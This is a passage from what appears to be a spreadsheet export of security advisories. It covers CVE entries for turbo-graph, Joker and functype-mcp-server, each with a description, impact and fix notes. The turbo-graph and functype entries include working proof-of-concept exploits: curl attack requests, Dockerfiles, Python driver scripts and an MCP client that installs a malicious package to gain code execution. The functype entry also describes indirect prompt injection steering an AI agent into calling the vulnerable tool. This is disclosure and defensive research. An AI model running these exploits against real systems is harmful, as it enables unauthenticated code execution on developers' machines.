```
Because `spawn()` is invoked with an argument array (not a shell string), traditional shell metacharacter injection does not apply. However, this does not mitigate the vulnerability: any task name defined in `turbo.json` of the victim's repository can be selected and run without restriction.
### PoC
**Environment setup (victim machine):**
```bash
mkdir /tmp/tg-poc &amp;&amp; cd /tmp/tg-poc
cat &gt; package.json &lt;&lt;'JSON'
{
  "private": true,
  "scripts": {
    "pwn": "node -e \"require('fs').writeFileSync('/tmp/turbo-graph-poc', 'owned\\n')\""
  },
  "devDependencies": {
    "@yeger/turbo-graph": "2.8.8",
    "turbo": "^2.0.0"
  }
}
JSON
cat &gt; turbo.json &lt;&lt;'JSON'
{
  "tasks": {
    "pwn": { "cache": false }
  }
}
JSON
npm install
npx turbo-graph --port 29312
```
**Verify the server is bound to all interfaces (Flaw 1):**
```bash
ss -tlnp 'sport = :29312'
# Expected: LISTEN 0 511 *:29312  (0.0.0.0, not 127.0.0.1)
```
**Attack request (from any host on the same network segment):**
```bash
# Replace &lt;victim-ip&gt; with the victim machine's LAN IP address.
curl -N "http://&lt;victim-ip&gt;:29312/api/run?tasks=pwn&amp;force=true"
```
**Expected outcome:**
- The server returns HTTP 200 with a `text/event-stream` response.
- An SSE `start` event is received with `args: ["run", "pwn", "--ui=stream", "--force"]`, confirming that the unauthenticated request was accepted.
- The file `/tmp/turbo-graph-poc` is created on the victim machine with content `owned`, proving arbitrary task execution.
**Containerized reproduction (automated):**
The enclosed `Dockerfile` and `poc.py` provide a self-contained reproduction. Build and run:
```bash
docker build -t vuln-001-poc &lt;vuln-001-dir&gt;
docker run --rm vuln-001-poc
```
The container confirmed all three evidence points during Phase 2 dynamic testing:
1. `ss -tlnp sport=:29312` → `LISTEN 0 511 *:29312` (all-interface binding confirmed)
2. `GET /api/run?tasks=pwn&amp;force=true` → HTTP 200, SSE `start` event with `args: ["run","pwn","--ui=stream","--force"]` (no token required)
3. `/tmp/poc-proof.txt` created with content `PWNED:&lt;timestamp&gt;` (arbitrary task execution confirmed)
### Impact
This is a **Missing Authentication for Critical Function (CWE-306)** vulnerability. Any unauthenticated attacker reachable on the same network segment as a developer running `turbo-graph` can execute arbitrary Turborepo tasks defined in that developer's repository.
Depending on the tasks configured in the victim's `turbo.json`, the impact includes:
- **Confidentiality (High):** Tasks that read secrets, generate build artifacts, or invoke cloud CLI commands can exfiltrate sensitive data.
- **Integrity (High):** Tasks that write files, run migrations, commit code, or invoke deployment scripts can permanently modify the victim's project or infrastructure.
- **Availability (High):** Tasks that delete data, exhaust resources, or run destructive build steps can disrupt ongoing development work.
The attack requires no credentials, no prior access, and no interaction from the victim beyond having `turbo-graph` running. The default port (`29312`) is static and predictable, making targeted network scanning straightforward. All users who run `npx turbo-graph` or install `@yeger/turbo-graph@2.8.8` in a shared or corporate network environment are affected.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# VULN-001 PoC: Unauthenticated Turborepo Task Execution (@yeger/turbo-graph@2.8.8)
#
# Layout:
#   /victim/          - simulated developer workspace that runs turbo-graph
#   /victim/pwn.js    - the task payload executed when the attacker fires /api/run
#   /poc.py           - attacker script: sends unauthenticated GET /api/run?tasks=pwn
#
# Build:
#   docker build -t vuln-001-poc &lt;vuln-001-dir&gt;
#
# Run:
#   docker run --rm vuln-001-poc
FROM node:20-slim
# System tools:
#   python3    - runs poc.py
#   iproute2   - ss(8) for socket-binding introspection (evidence collection)
RUN apt-get update &amp;&amp; \
    apt-get install -y --no-install-recommends python3 iproute2 &amp;&amp; \
    rm -rf /var/lib/apt/lists/*
# ---------------------------------------------------------------------------
# Victim workspace: a minimal Turborepo project that a developer might run
# ---------------------------------------------------------------------------
WORKDIR /victim
# package.json: defines the 'pwn' task script and package dependencies.
# @yeger/turbo-graph@2.8.8 is the vulnerable package (from DerYeger/yeger).
# turbo satisfies the peerDependency and provides node_modules/.bin/turbo.
RUN echo '{"private":true,"name":"victim-project","packageManager":"npm@10.8.2","scripts":{"pwn":"node /victim/pwn.js"},"devDependencies":{"@yeger/turbo-graph":"2.8.8","turbo":"^2.0.0","react":"^18.0.0","react-dom":"^18.0.0"}}' \
    &gt; /victim/package.json
# turbo.json: declares the 'pwn' task with caching disabled so it always runs.
RUN echo '{"tasks":{"pwn":{"cache":false}}}' \
    &gt; /victim/turbo.json
# pwn.js: task payload — writes a timestamped proof file and logs to stdout.
# When an attacker sends GET /api/run?tasks=pwn, turbo-graph runs this script.
RUN echo 'const fs = require("fs"); const ts = Date.now().toString(); fs.writeFileSync("/tmp/poc-proof.txt", "PWNED:" + ts); console.log("TASK_EXECUTED:" + ts);' \
    &gt; /victim/pwn.js
# Install packages from the declarations in package.json.
# --legacy-peer-deps avoids strict peer-dep resolution failures.
# The published @yeger/turbo-graph-ui@2.8.8 tarball ships a pre-built
# .next/ directory, so no separate 'next build' step is required.
RUN npm install --legacy-peer-deps --no-fund --no-audit 2&gt;&amp;1 | tail -5
# ---------------------------------------------------------------------------
# Attacker PoC script
# ---------------------------------------------------------------------------
COPY poc.py /poc.py
# Default: execute the PoC (start server, fire unauthenticated request, verify)
CMD ["python3", "/poc.py"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
PoC for VULN-001: Unauthenticated Network-Exposed Turborepo Task Execution
Package:  @yeger/turbo-graph@2.8.8
CWE:      CWE-306 (Missing Authentication for Critical Function)
CVSS:     8.8 High (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Two independent flaws combine into the vulnerability:
  1. packages/turbo-graph/src/index.ts:44 calls .listen(port) without a
     hostname argument, so Node.js defaults to 0.0.0.0 (all interfaces).
  2. packages/turbo-graph-ui/app/api/run/route.ts:156-177 GET() handler
     has zero authentication; attacker-supplied ?tasks= values are passed
     directly to spawn(turboBin, ['run', ...tasks], { cwd: victimDir }).
Attack scenario reproduced here:
  - Victim runs `turbo-graph` from a project with a side-effecting task.
  - Attacker sends a plain unauthenticated GET /api/run?tasks=pwn.
  - The server executes `turbo run pwn` in the victim's project directory.
  - The 'pwn' task writes /tmp/poc-proof.txt, proving arbitrary execution.
"""
import os
import socket
import subprocess
import sys
import time
import urllib.error
import urllib.request
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
PROOF_FILE = "/tmp/poc-proof.txt"
PORT = 29312
VICTIM_DIR = "/victim"
TURBO_GRAPH_BIN = os.path.join(VICTIM_DIR, "node_modules", ".bin", "turbo-graph")
SERVER_STARTUP_TIMEOUT = 120   # seconds; Next.js production startup can be slow
REQUEST_TIMEOUT = 90            # seconds to wait for the SSE stream to finish
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def wait_for_port(host: str, port: int, timeout: int) -&gt; bool:
    """Poll until the TCP port accepts connections or timeout expires."""
    deadline = time.time() + timeout
    while time.time() &lt; deadline:
        try:
            with socket.create_connection((host, port), timeout=2):
                return True
        except (ConnectionRefusedError, OSError):
            time.sleep(1)
    return False
def get_socket_binding(port: int) -&gt; str:
    """Return the raw 'ss' output for the listening socket on *port*."""
    try:
        result = subprocess.run(
            ["ss", "-tlnp", f"sport = :{port}"],
            capture_output=True,
            text=True,
            timeout=5,
        )
        return result.stdout.strip()
    except Exception as exc:
        return f"(ss unavailable: {exc})"
def binding_is_all_interfaces(ss_output: str) -&gt; bool:
    """Return True when the socket is listening on all interfaces."""
    return any(
        marker in ss_output
        for marker in ("0.0.0.0", "*:", "[::]", ":::")
    )
def read_sse_stream(url: str, timeout: int) -&gt; list:
    """
    Open *url* as a Server-Sent Events stream and return parsed events.
    Each event is a dict with keys 'type' and optionally 'data'.
    Stops when an 'end' event is received or *timeout* seconds elapse.
    """
    events = []
    try:
        req = urllib.request.Request(
            url,
            headers={
                "Accept": "text/event-stream",
                "Cache-Control": "no-cache",
                "Connection": "keep-alive",
            },
        )
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            print(f"  [HTTP] {resp.status} {resp.reason}")
            print(f"  [HTTP] Content-Type: {resp.getheader('Content-Type', '')}")
            buf = ""
            deadline = time.time() + timeout
            while time.time() &lt; deadline:
                chunk = resp.read(4096)
                if not chunk:
                    break
                buf += chunk.decode("utf-8", errors="replace")
                # Parse complete SSE blocks (separated by blank lines)
                while "\n\n" in buf:
                    block, buf = buf.split("\n\n", 1)
                    ev: dict = {}
                    for line in block.strip().split("\n"):
                        if line.startswith("event: "):
                            ev["type"] = line[7:]
                        elif line.startswith("data: "):
                            ev["data"] = line[6:]
                        # ignore SSE comments (':') and 'retry:' lines
                    if ev.get("type"):
                        events.append(ev)
                        preview = ev.get("data", "")[:120]
                        print(f"  [SSE]  event={ev['type']}  data={preview}")
                        if ev["type"] == "end":
                            return events
    except urllib.error.HTTPError as exc:
        print(f"  [!] HTTP error: {exc.code} {exc.reason}")
    except Exception as exc:
        print(f"  [!] Stream error: {type(exc).__name__}: {exc}")
    return events
# ---------------------------------------------------------------------------
# Main PoC
# ---------------------------------------------------------------------------
def main() -&gt; int:
    sep = "=" * 64
    print(sep)
    print("VULN-001 PoC  —  Unauthenticated Turborepo Task Execution")
    print("Package : @yeger/turbo-graph@2.8.8")
    print("CWE-306 : Missing Authentication for Critical Function")
    print(sep)
    print()
    # Remove stale proof file from a previous run
    if os.path.exists(PROOF_FILE):
        os.remove(PROOF_FILE)
    # ------------------------------------------------------------------
    # Step 1: Start turbo-graph server from the victim project directory
    # The CLI does NOT pass a hostname to .listen(), so Node.js binds to
    # 0.0.0.0 (all interfaces) — see index.ts:44.
    # ------------------------------------------------------------------
    print(f"[1] Starting turbo-graph from {VICTIM_DIR} on port {PORT} ...")
    server = subprocess.Popen(
        [TURBO_GRAPH_BIN, "--port", str(PORT)],
        cwd=VICTIM_DIR,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        text=True,
    )
    # ------------------------------------------------------------------
    # Step 2: Wait for the port to become available
    # ------------------------------------------------------------------
    print(f"[2] Waiting up to {SERVER_STARTUP_TIMEOUT}s for Next.js server startup ...")
    ready = wait_for_port("127.0.0.1", PORT, timeout=SERVER_STARTUP_TIMEOUT)
    if not ready:
        server.kill()
        stdout, _ = server.communicate()
        print(f"[!] Server did not become ready within {SERVER_STARTUP_TIMEOUT}s.")
        print(f"    stdout/stderr:\n{stdout[:2000]}")
        return 1
    print(f"[+] Server is accepting connections on port {PORT}.")
    # ------------------------------------------------------------------
    # Step 3: Verify that the socket is bound to 0.0.0.0 (all interfaces)
    # Flaw 1: .listen(port) without hostname → network-exposed.
    # ------------------------------------------------------------------
    ss_output = get_socket_binding(PORT)
    print(f"\n[3] Socket binding (ss -tlnp sport=:{PORT}):")
    print(f"    {ss_output}")
    if binding_is_all_interfaces(ss_output):
        print(f"[+] FLAW-1 CONFIRMED: Server bound to all interfaces (0.0.0.0 / ::), not loopback only.")
    else:
        print(f"[?] Could not confirm all-interface binding; proceeding with request test.")
    # ------------------------------------------------------------------
    # Step 4: Send an unauthenticated GET /api/run?tasks=pwn request
    # Flaw 2: no authentication, authorisation, CSRF check, or task
    #         allowlist — see route.ts:156-177.
    # ------------------------------------------------------------------
    url = f"http://127.0.0.1:{PORT}/api/run?tasks=pwn&amp;force=true"
    print(f"\n[4] Sending unauthenticated HTTP request (no token, no credentials):")
    print(f"    GET {url}")
    sse_events = read_sse_stream(url, timeout=REQUEST_TIMEOUT)
    # Allow a moment for any buffered I/O in the child process to flush
    time.sleep(3)
    # ------------------------------------------------------------------
    # Step 5: Evaluate exploitation results
    # ------------------------------------------------------------------
    exploited = os.path.exists(PROOF_FILE)
    proof_content = open(PROOF_FILE).read().strip() if exploited else ""
    start_event = next((e for e in sse_events if e.get("type") == "start"), None)
    end_event   = next((e for e in sse_events if e.get("type") == "end"),   None)
    log_events  = [e for e in sse_events if e.get("type") in ("log", "stderr")]
    print()
    print(sep)
    print("EVIDENCE SUMMARY")
    print(sep)
    # Evidence A: socket binding
    if binding_is_all_interfaces(ss_output):
        print(f"[A] FLAW-1  — Socket bound to all interfaces: {ss_output.split(chr(10))[0][:80]}")
    else:
        print(f"[A] FLAW-1  — ss output: {ss_output[:80]}")
    # Evidence B: unauthenticated SSE response
    if start_event:
        print(f"[B] FLAW-2  — Unauthenticated /api/run accepted; SSE start args:")
        print(f"              {start_event.get('data', '')}")
    else:
        received = [e.get("type") for e in sse_events]
        print(f"[B] FLAW-2  — SSE events received: {received}")
    # Evidence C: turbo task exit code
    if end_event:
        print(f"[C] TURBO   — turbo run exit code: {end_event.get('data', '')}")
    # Evidence D: proof file (arbitrary code execution)
    if exploited:
        print(f"[D] EXPLOIT — Proof file created: {PROOF_FILE}")
        print(f"              Content: {proof_content}")
    else:
        print(f"[D] EXPLOIT — Proof file NOT created: {PROOF_FILE}")
        if log_events:
            print(f"    Task stdout/stderr (first 5 lines):")
            for ev in log_events[:5]:
                print(f"      [{ev['type']}] {ev.get('data', '')}")
    print(sep)
    # Clean up
    server.kill()
    server.wait(timeout=10)
    if exploited:
        print("\n[RESULT] PASS — Exploitation reproduced. Proof file written by unauthenticated request.")
        return 0
    else:
        print("\n[RESULT] FAIL — Proof file not created. See evidence above for diagnostics.")
        return 1
if __name__ == "__main__":
    sys.exit(main())
```</t>
        </is>
      </c>
      <c r="S633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59160</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59172</t>
        </is>
      </c>
      <c r="D634" s="5" t="inlineStr"/>
      <c r="E634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F634" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="inlineStr"/>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr"/>
      <c r="L634" s="5" t="inlineStr">
        <is>
          <t>go:github.com/candid82/joker</t>
        </is>
      </c>
      <c r="M634" s="5" t="inlineStr">
        <is>
          <t>1.8.2</t>
        </is>
      </c>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr"/>
      <c r="P634" s="5" t="inlineStr"/>
      <c r="Q634" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="R634" s="5" t="inlineStr">
        <is>
          <t>## Impact
In Joker versions before 1.8.2, `joker --lint &lt;file&gt;` located a `.jokerd/` directory by walking up from the linted file and executed matching `linter.*` files from that directory before linting. Because these files are executable Joker/Clojure code, linting a file inside an untrusted repository could execute code supplied by that repository.
This could be triggered by editor integrations or CI jobs that automatically run `joker --lint` on checked-out source code.
## Patches
Fixed in Joker v1.8.2. Executable linter customization files are now loaded only from the user's home `.jokerd` directory (`~/.jokerd/linter.cljc`, `~/.jokerd/linter.clj`, `~/.jokerd/linter.cljs`, or `~/.jokerd/linter.joke`). Project-local `.jokerd/linter.*` files are no longer executed.
## Workarounds
Users who cannot upgrade should avoid running `joker --lint` on untrusted repositories, especially through editor integrations or unattended CI. Removing or disabling project-local `.jokerd/linter.*` files before linting also avoids the code-execution path.
## Credits
Reported by Younghun Ko of AhnLab (@koyokr).</t>
        </is>
      </c>
      <c r="S634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59172</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59176</t>
        </is>
      </c>
      <c r="D635" s="5" t="inlineStr"/>
      <c r="E635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F635" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="inlineStr"/>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr"/>
      <c r="L635" s="5" t="inlineStr">
        <is>
          <t>npm:functype-mcp-server</t>
        </is>
      </c>
      <c r="M635" s="5" t="inlineStr">
        <is>
          <t>1.4.4</t>
        </is>
      </c>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr"/>
      <c r="P635" s="5" t="inlineStr"/>
      <c r="Q635" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="R635" s="5" t="inlineStr">
        <is>
          <t>## MCP `set_functype_version` Package Alias RCE via Unsanitized pnpm install + Dynamic Import
### Summary
The `set_functype_version` MCP tool in `functype-mcp-server` accepts an unconstrained `version` string, interpolates it directly into an npm package specifier (`functype@&lt;version&gt;`), and installs it via `pnpm add` without any validation. Because npm/pnpm package specifiers support `file:`, `npm:`, and other alias syntaxes, an attacker who can send an MCP `tools/call` request to this tool can cause the server to install an arbitrary local or remote package as `functype`. Immediately after installation, the server calls `initDocsData(true)`, which dynamically imports `functype/cli` from the newly installed location, executing attacker-controlled JavaScript in the MCP server process. This results in full Remote Code Execution (RCE) with the privileges of the server process — full confidentiality, integrity, and availability impact (CVSS 7.8 High).
### Details
The vulnerable code is in `packages/mcp-server/src/index.ts`. The `set_functype_version` tool is registered at line 115 and is enabled by default (no authentication required in stdio mode).
**Source (user input accepted without validation):**
```ts
// packages/mcp-server/src/index.ts:119-121
parameters: z.object({
  version: z.string().describe('The functype version to install (e.g., "0.46.0", "latest", "^0.45.0")'),
}),
```
Only `z.string()` validation is applied — no semver format check, no allowlist for dist-tags, and no rejection of `file:`, `npm:`, URL, or path alias syntaxes.
**Sink 1 — arbitrary package installation:**
```ts
// packages/mcp-server/src/index.ts:122-125
execute: async (args) =&gt; {
  const spec = `functype@${args.version}`
  try {
    execFileSync("pnpm", ["add", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
```
`args.version` is interpolated into the package specifier string and passed directly to `pnpm add`. Supplying `file:/path/to/evil` causes pnpm to install an attacker-controlled directory as the `functype` package alias.
**Sink 2 — dynamic import executes installed package code:**
```ts
// packages/mcp-server/src/lib/docs/data.ts:23-30
if (force) {
  const resolvedPath = require.resolve("functype/cli")
  cli = await import(`${pathToFileURL(resolvedPath).href}?t=${Date.now()}`)
}
```
`initDocsData(true)` is called immediately after installation (line 134 in `index.ts`). It resolves `functype/cli` from the node_modules that now points to the attacker's package and dynamically imports it, executing any module-level code in the attacker's `cli.js` at import time.
**Data flow summary:**
1. `index.ts:115` — MCP tool `set_functype_version` registered, no auth required.
2. `index.ts:119-121` — `version` accepted as raw `z.string()` (source).
3. `index.ts:123` — `functype@${args.version}` constructed without sanitization.
4. `index.ts:125` — `execFileSync("pnpm", ["add", spec], ...)` installs attacker-controlled package (sink: arbitrary install).
5. `index.ts:134` — `initDocsData(true)` called immediately.
6. `data.ts:29-30` — `require.resolve("functype/cli")` + dynamic `import()` executes attacker module (sink: RCE).
### PoC
**Step 1 — Prepare the attacker-controlled evil package:**
```bash
mkdir -p /tmp/evil
cat &gt; /tmp/evil/package.json &lt;&lt;'EOF'
{"name":"evil-functype","version":"1.0.0","type":"module","exports":{"./cli":"./cli.js"}}
EOF
cat &gt; /tmp/evil/cli.js &lt;&lt;'EOF'
import { writeFileSync } from "node:fs";
writeFileSync("/pwned.txt", "RCE: mcp import-time code execution via set_functype_version\n");
export const TYPES = {};
export const INTERFACES = {};
export const CATEGORIES = {};
export const FULL_INTERFACES = {};
export const VERSION = "1.0.0";
EOF
```
**Step 2 — Clone and build the victim monorepo at the affected version:**
```bash
TMP="$(mktemp -d)"
git clone https://github.com/jordanburke/functype.git "$TMP/functype"
cd "$TMP/functype"
git checkout v1.4.3
corepack enable
pnpm install --frozen-lockfile
pnpm -F functype build
pnpm -F functype-mcp-server build
```
**Step 3 — Set up an MCP client to deliver the exploit:**
```bash
cd "$TMP"
npm init -y
npm pkg set type=module
npm install @modelcontextprotocol/sdk
cat &gt; exploit.mjs &lt;&lt;'EOF'
import { Client } from "@modelcontextprotocol/sdk/client/index.js";
import { StdioClientTransport } from "@modelcontextprotocol/sdk/client/stdio.js";
const client = new Client({ name: "poc", version: "1.0.0" });
const transport = new StdioClientTransport({
  command: "node",
  args: [`${process.env.REPO}/packages/mcp-server/dist/bin.js`],
  env: { ...process.env, TRANSPORT_TYPE: "stdio" },
});
await client.connect(transport);
const result = await client.callTool({
  name: "set_functype_version",
  arguments: { version: "file:/tmp/evil" },
});
console.log(result);
await client.close();
EOF
REPO="$TMP/functype" node exploit.mjs
```
**Step 4 — Verify arbitrary code execution:**
```bash
cat /pwned.txt
# Expected output: RCE: mcp import-time code execution via set_functype_version
```
**Dynamic reproduction (Docker):**
The Phase 2 dynamic test used the provided Dockerfile which automates the above steps inside a container. The container confirmed creation of `/pwned.txt` with the expected payload string, proving end-to-end RCE.
```
[poc] EXPLOIT SUCCEEDED: /pwned.txt exists
[poc] File contents: RCE: mcp import-time code execution via set_functype_version
[evil-payload] Arbitrary code executed via functype/cli dynamic import
```
**Recommended remediation:**
```diff
+const SAFE_FUNCTYPE_VERSION = /^(?:latest|next|beta|alpha|canary|rc|[~^]?v?\d+(?:\.\d+){0,2}(?:-[0-9A-Za-z.-]+)?(?:\+[0-9A-Za-z.-]+)?)$/
+
+const isSafeFunctypeVersion = (version: string): boolean =&gt; {
+  const trimmed = version.trim()
+  return trimmed === version &amp;&amp; SAFE_FUNCTYPE_VERSION.test(trimmed) &amp;&amp; !/[/:\\@]/.test(trimmed)
+}
 execute: async (args) =&gt; {
-  const spec = `functype@${args.version}`
+  if (!isSafeFunctypeVersion(args.version)) {
+    return "Invalid functype version. Use a semver version, range prefix (^ or ~), or a known dist-tag."
+  }
+  const spec = `functype@${args.version}`
   try {
-    execFileSync("pnpm", ["add", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
+    execFileSync("pnpm", ["add", "--ignore-scripts", spec], { cwd: PROJECT_ROOT, stdio: "pipe", timeout: 60_000 })
```
### Impact
This is a **Remote Code Execution (RCE)** vulnerability. Any MCP client that can invoke the `set_functype_version` tool — which requires no authentication and is enabled by default in the stdio MCP server — can execute arbitrary JavaScript in the MCP server process.
**Who is impacted:**
- Developers and teams running `functype-mcp-server` (version 1.4.3) in their local or CI environments as an AI coding assistant integration.
- Users whose AI assistant (LLM agent) is connected to this MCP server and is susceptible to indirect prompt injection: a malicious document or web page read by the AI could trigger a `set_functype_version` call with a `file:` or `npm:` alias payload.
- In non-default `TRANSPORT_TYPE=httpStream` deployments, network-accessible attackers can exploit this without local access.
The full impact at exploitation is confidentiality, integrity, and availability — an attacker can read secrets from the process environment, modify files, or crash the server.
### Reproduction artifacts
#### `Dockerfile`
```dockerfile
# Dockerfile for VULN-001: MCP set_functype_version Package Alias RCE
#
# Build context: reports/npmAI_684_jordanburke__functype/
#   COPY repo/       -&gt; /workspace/functype/   (victim monorepo)
#   COPY vuln-001/   -&gt; supporting PoC files
#
# Build:  docker build -t vuln001-functype-rce -f vuln-001/Dockerfile .
# Run:    docker run --rm vuln001-functype-rce
#
# Expected exit 0 with "[poc] EXPLOIT SUCCEEDED" in output.
FROM node:24-slim
# Install pnpm matching the repo's packageManager field (pnpm@11.7.0).
RUN npm install -g pnpm@11.7.0 --quiet
# ── Victim workspace ──────────────────────────────────────────────────────────
WORKDIR /workspace/functype
COPY repo/ ./
# Install all workspace deps. --no-frozen-lockfile avoids hash mismatches
# caused by running on a different pnpm minor than the one that generated the
# lockfile; the installed versions are still constrained by the lockfile
# specifiers for the packages we care about.
RUN pnpm install --no-frozen-lockfile
# Build functype first (mcp-server externals functype at build time).
RUN pnpm -F functype build
# Build the MCP server binary (output: packages/mcp-server/dist/bin.js).
RUN pnpm -F functype-mcp-server build
# ── Attacker-controlled evil package ─────────────────────────────────────────
# /evil/cli.js writes /pwned.txt when dynamically imported.
COPY vuln-001/evil/ /evil/
# ── MCP exploit client ────────────────────────────────────────────────────────
WORKDIR /client
RUN npm init -y --quiet &amp;&amp; \
    npm pkg set type=module &amp;&amp; \
    npm install @modelcontextprotocol/sdk@1.29.0 --quiet
COPY vuln-001/client/exploit.mjs ./exploit.mjs
# Default entrypoint: run the exploit and exit 0 on success.
CMD ["node", "/client/exploit.mjs"]
```
#### `poc.py`
```python
#!/usr/bin/env python3
"""
PoC driver for VULN-001: MCP set_functype_version Package Alias RCE
via Unsanitized pnpm install + Dynamic Import (CWE-829, CVSS 7.8 High).
Attack chain:
  1. Attacker calls MCP tool set_functype_version with version="file:/evil"
  2. Server executes: execFileSync("pnpm", ["add", "functype@file:/evil"], ...)
  3. Evil package is installed as the functype alias in mcp-server's node_modules
  4. Server calls initDocsData(true) which resolves functype/cli and dynamic-imports it
  5. /evil/cli.js runs at import time -&gt; writes /pwned.txt (arbitrary code execution)
Usage:
  python3 poc.py [--build-only]
Requirements:
  - Docker daemon running
  - Build context at parent directory of this file's directory
"""
import subprocess
import sys
import json
import os
import argparse
VULN_DIR = os.path.dirname(os.path.abspath(__file__))
REPORT_DIR = os.path.dirname(VULN_DIR)
IMAGE_NAME = "vuln001-functype-rce"
DOCKERFILE = os.path.join(VULN_DIR, "Dockerfile")
RESULT_FILE = os.path.join(VULN_DIR, "phase2_result.json")
BUILD_CMD = ["docker", "build", "-t", IMAGE_NAME, "-f", DOCKERFILE, REPORT_DIR]
RUN_CMD = ["docker", "run", "--rm", IMAGE_NAME]
def run(cmd, timeout=None, **kwargs):
    """Run a command and return CompletedProcess with combined output."""
    return subprocess.run(
        cmd,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        text=True,
        timeout=timeout,
        **kwargs,
    )
def write_result(passed, verdict, reason, evidence):
    result = {
        "passed": passed,
        "verdict": verdict,
        "reason": reason,
        "build_command": " ".join(BUILD_CMD),
        "run_command": " ".join(RUN_CMD),
        "poc_command": f"python3 {os.path.basename(__file__)}",
        "evidence": evidence,
        "artifacts": ["Dockerfile", "poc.py", "evil/package.json", "evil/cli.js", "client/exploit.mjs"],
    }
    with open(RESULT_FILE, "w", encoding="utf-8") as f:
        json.dump(result, f, indent=2, ensure_ascii=False)
    print(f"[poc] Result written to {RESULT_FILE}")
    print(f"[poc] verdict={verdict}  passed={passed}")
def main():
    parser = argparse.ArgumentParser(description="VULN-001 PoC driver")
    parser.add_argument("--build-only", action="store_true", help="Only build the image, do not run")
    args = parser.parse_args()
    # ── Build ─────────────────────────────────────────────────────────────────
    print("[poc] Building Docker image (this may take a few minutes)...")
    print(f"[poc] Build command: {' '.join(BUILD_CMD)}")
    try:
        build = run(BUILD_CMD, timeout=900)
    except subprocess.TimeoutExpired:
        msg = "Docker build timed out after 900 seconds"
        print(f"[poc] ERROR: {msg}")
        write_result(False, "INCOMPLETE", f"빌드 타임아웃: {msg}", msg)
        sys.exit(2)
    if build.returncode != 0:
        tail = (build.stdout + "\n" + build.stderr)[-3000:]
        print("[poc] Build FAILED:")
        print(tail)
        write_result(
            False,
            "FAIL",
            "Docker 이미지 빌드 실패. pnpm install 또는 TypeScript 빌드 오류 확인 필요.",
            f"BUILD EXIT {build.returncode}\n{tail}",
        )
        sys.exit(1)
    print("[poc] Build succeeded.")
    if args.build_only:
        print("[poc] --build-only flag set; skipping run.")
        sys.exit(0)
    # ── Run ───────────────────────────────────────────────────────────────────
    print(f"[poc] Running exploit container: {' '.join(RUN_CMD)}")
    try:
        run_result = run(RUN_CMD, timeout=180)
    except subprocess.TimeoutExpired:
        msg = "Container run timed out after 180 seconds"
        print(f"[poc] ERROR: {msg}")
        write_result(False, "INCOMPLETE", f"컨테이너 실행 타임아웃: {msg}", msg)
        sys.exit(2)
    stdout = run_result.stdout or ""
    stderr = run_result.stderr or ""
    combined = stdout + "\n" + stderr
    print("=" * 60)
    print("STDOUT:")
    print(stdout)
    print("STDERR:")
    print(stderr)
    print(f"EXIT CODE: {run_result.returncode}")
    print("=" * 60)
    # Success criteria: exit 0 AND exploit succeeded message present
    exploit_succeeded = "EXPLOIT SUCCEEDED" in combined
    passed = run_result.returncode == 0 and exploit_succeeded
    if passed:
        # Extract key evidence lines
        evidence_lines = [
            line for line in combined.splitlines()
            if any(kw in line for kw in ("EXPLOIT SUCCEEDED", "pwned.txt", "evil-payload", "RCE:"))
        ]
        evidence = "\n".join(evidence_lines) if evidence_lines else combined[-1000:]
        write_result(
            True,
            "PASS",
            (
                "컨테이너 내 /pwned.txt 생성 확인: MCP set_functype_version 도구에 "
                'version="file:/evil" 인수를 전달하자 서버가 pnpm add functype@file:/evil을 실행한 후 '
                "initDocsData(true)가 동적 import를 통해 evil/cli.js를 실행, 임의 파일 쓰기(RCE)가 발생함."
            ),
            evidence,
        )
        print("[poc] === PASS: exploit reproduced ===")
        sys.exit(0)
    else:
        # Distinguish failure modes
        if not exploit_succeeded and run_result.returncode == 0:
            verdict = "INCOMPLETE"
            reason = (
                "/pwned.txt가 생성되지 않았으나 컨테이너는 정상 종료됨. "
                "pnpm add 후 require.resolve 경로 확인 필요 — pnpm 가상 스토어 구조로 인해 "
                "node_modules/functype 심볼릭링크가 예상 위치에 없을 수 있음."
            )
        else:
            verdict = "FAIL"
            reason = (
